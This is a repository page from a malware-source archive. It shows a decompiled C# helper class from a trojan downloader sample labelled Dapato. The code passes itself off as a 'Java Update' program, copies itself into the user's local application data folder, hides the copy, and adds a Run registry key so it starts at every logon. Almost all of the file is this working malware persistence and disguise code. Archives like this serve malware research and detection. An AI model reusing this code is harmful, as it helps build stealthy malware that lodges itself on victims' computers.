ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2025-01-19 16:48:52 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
f2ac1ece55
MalwareSourceCode/MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd/browser_bastan/Araclar.cs
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

65 lines
2.1 KiB
C#
Raw Blame History

// Decompiled with JetBrains decompiler
// Type: browser_bastan.Araclar
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
using Microsoft.Win32;
using System;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
namespace browser_bastan
{
public sealed class Araclar
{
private const string RegKey = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run";
private const int FEATURE_DISABLE_NAVIGATION_SOUNDS = 21;
private const int SET_FEATURE_ON_PROCESS = 2;
public static string Regkeyname = "Java Update";
public static string DstName = "JavaUpdate.exe";
[DllImport("urlmon.dll")]
[return: MarshalAs(UnmanagedType.Error)]
private static extern int CoInternetSetFeatureEnabled(
int FeatureEntry,
[MarshalAs(UnmanagedType.U4)] int dwFlags,
bool fEnable);
public static void DisableClickSounds() => Araclar.CoInternetSetFeatureEnabled(21, 2, true);
public static void Copy(string src, string dst)
{
if (File.Exists(dst))
File.SetAttributes(dst, FileAttributes.Normal);
try
{
File.Copy(src, dst, true);
}
catch (Exception ex)
{
}
File.SetAttributes(dst, FileAttributes.Hidden);
}
public static void Startup(string name, string path)
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
if (registryKey == null)
return;
registryKey.SetValue(name, (object) path);
registryKey.Close();
}
public static void DstCheck()
{
string location = Assembly.GetExecutingAssembly().Location;
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData);
if (Path.GetDirectoryName(location) == folderPath)
return;
Araclar.Copy(location, folderPath + "\\" + Araclar.DstName);
}
}
}
Reference in New Issue View Git Blame Copy Permalink